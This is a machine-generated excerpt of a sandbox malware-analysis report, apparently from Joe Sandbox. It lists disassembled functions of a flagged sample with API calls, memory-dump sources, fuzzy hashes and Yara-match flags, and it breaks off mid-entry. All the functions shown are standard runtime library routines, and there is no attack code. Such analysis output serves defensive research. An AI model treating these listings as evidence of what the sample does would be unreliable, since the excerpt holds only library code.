                                                                                                                                                                                                                                  • Instruction ID: 73cb72f507c3d50e0cbff2fb1529f80598a5af570fd775ef65b15c2358fe50ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62C1E475E08349AFDF51DFA8DC84BADBBB1BF09310F084999E641AB391C7309A41CB65
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414D65
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414D7E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DB0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DB9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DC5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                  • Opcode ID: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                  • Instruction ID: 4e3572d10ca72b0cc8c55f95b2e81b49ef67830968b65e4bef4c2f16e2eaf972
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71B11875A012199BDB24DF18D884BEEB7B4FF88314F6045AAE809A7350E735AE91CF44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CF4CB1 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: GetLastError.KERNEL32(?,?,05CEE697,?,?,?,05CEED94,?), ref: 05CF6F84
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: _free.LIBCMT ref: 05CF6FB7
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: SetLastError.KERNEL32(00000000), ref: 05CF6FF8
                                                                                                                                                                                                                                    • Part of subcall function 05CF6F80: _abort.LIBCMT ref: 05CF6FFE
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 05CF4F5B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF4FCC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF4FE5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF5017
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF5020
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CF502C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                  • Opcode ID: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
                                                                                                                                                                                                                                  • Instruction ID: 6f8bcdcea9191f5f106ae7f4b1053260694e3d17a000b5d377f018b67990ff77
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CB12C75A01219DFDF68DF18C888AAEB7B5FF48304F1049AADA49A7350D735AE90CF40
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004167D1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004168B6
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00416926
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0041692F
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00416954
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3864826663-0
                                                                                                                                                                                                                                  • Opcode ID: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                  • Instruction ID: 26764a85889f0707fbffed2f2a276afb84307330fa482a04e449b3980190c86e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C51D4B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFD04D6280DB38DC80C6A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041EF07 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
                                                                                                                                                                                                                                  • Instruction ID: 68ef0a4baed83bf313a212b59b327df333dc31b97233ae496646a1f671aa2022
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A61B171900205AFDB20DF65C841BEABBF4EF48710F1441BBED44EB252E734AD868B98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CFF16E Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                  • Instruction ID: 41a3fe5170958441eaa86500ec228bba5868c20a189a0ea3117ada93a9d0fde8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16879e562c41d271cc16cff151e7cbd4d44b0ffa200e9325e312bb0433d02818
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF61C475A04205AFDF60DFA8C841BAEBBF5FF44710F14496AEA45EB240DB709A41DB90
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00415AD0
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00415AEB
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                  • Opcode ID: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                  • Instruction ID: 97884a52693caeb5a5c3a9d5f4bc50bcec63f9a7d6aba0d10f38b6cf3ce1f43d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C051F1B1A05608DFDB10CFA8D881BEEBBF4EF49310F14416BE955E3291D774A981CB68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CF5C7A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,05CF63EF,?,?,?,?,?,?), ref: 05CF5CBC
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 05CF5D37
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 05CF5D52
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 05CF5D78
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,05CF63EF,00000000,?,?,?,?,?,?,?,?,?,05CF63EF,?), ref: 05CF5D97
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,05CF63EF,00000000,?,?,?,?,?,?,?,?,?,05CF63EF,?), ref: 05CF5DD0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                  • Opcode ID: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
                                                                                                                                                                                                                                  • Instruction ID: 4d795b1b984dc8abf43f9399c60103fdef18c1c62fd80f0346454b2c5d7d13f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb6d35f48d1bebdfaee63c5326d5eda48187afe5479d9753ca614cb5bfedeae6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E351D471A00249AFDB20CFA8D885BEEBBF4FF09300F15456AE651F7291D7349951CBA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040C7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0040C7DB
                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0040C7E3
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0040C871
                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0040C89C
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0040C8F1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                  • Instruction ID: 4609d27efc8d7a17fa762f128460d8fd5adcc0840ed3b149ea1d44a8c589526f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F418235E00208DBCB10EF69C880A9EBBB5AF45315F14C27BE8156B3D1D7399945CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CE1417 Relevance: 10.6, APIs: 7, Instructions: 105COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05CE141C
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 05CE142E
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 05CE146B
                                                                                                                                                                                                                                    • Part of subcall function 05CE80E1: _Yarn.LIBCPMT ref: 05CE8100
                                                                                                                                                                                                                                    • Part of subcall function 05CE80E1: _Yarn.LIBCPMT ref: 05CE8124
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 05CE148C
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 05CE149A
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 05CE14BD
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 05CE152E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 835844855-0
                                                                                                                                                                                                                                  • Opcode ID: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
                                                                                                                                                                                                                                  • Instruction ID: 1bd228da3dbe0402d34735a528443132ebae18fb1d1cce603f4e58e0ce03efd4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b966b326459ba2342e1ffa8f210576540c6bcc155a50cbc91a1a0f115c5258d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89317E72905B40DFC736AF29D84465AFBF4FF48A10B14CE2FE09B92A40C774A605DB59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004228D8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
                                                                                                                                                                                                                                  • Instruction ID: eb3437e7256d6e9500263c5b78cb76159e7e032ed684a14598ba9abdd6a69119
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85112BB27081297FDB202F739D04AAF3A5CDF85734B51022EBC15D6241DEBC88818669
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041F3DC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041F123: _free.LIBCMT ref: 0041F14C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F42A
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F435
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F440
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F494
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F49F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F4AA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F4B5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction ID: 6442e121d4515539895166ad143442a8d84c52f7901faf26133e6203624009ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79113D71540B14FADA20BBF2DC07FCB77DCAF4470CF40482EBA9A66052DA7DB9894654
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05CFF643 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 05CFF38A: _free.LIBCMT ref: 05CFF3B3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF691
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: HeapFree.KERNEL32(00000000,00000000,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?), ref: 05CF6517
                                                                                                                                                                                                                                    • Part of subcall function 05CF6501: GetLastError.KERNEL32(?,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?,?), ref: 05CF6529
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF69C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF6A7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF6FB
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF706
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF711
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05CFF71C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction ID: 085445c6cf7a3b734d574a86dbe914d736fed9e5b18b1274be8123c1b17cbaad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94115473641708BADEB0B7B0CC49FCB779DEF08700F401C19A79A66050DA69F548AB51
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040418E
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 004041B4
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 004041BD
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004041EE
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction ID: 0d98e69d0512f29499375b1b223a36d4520ec3994eac90c636b6988e9ad91f04
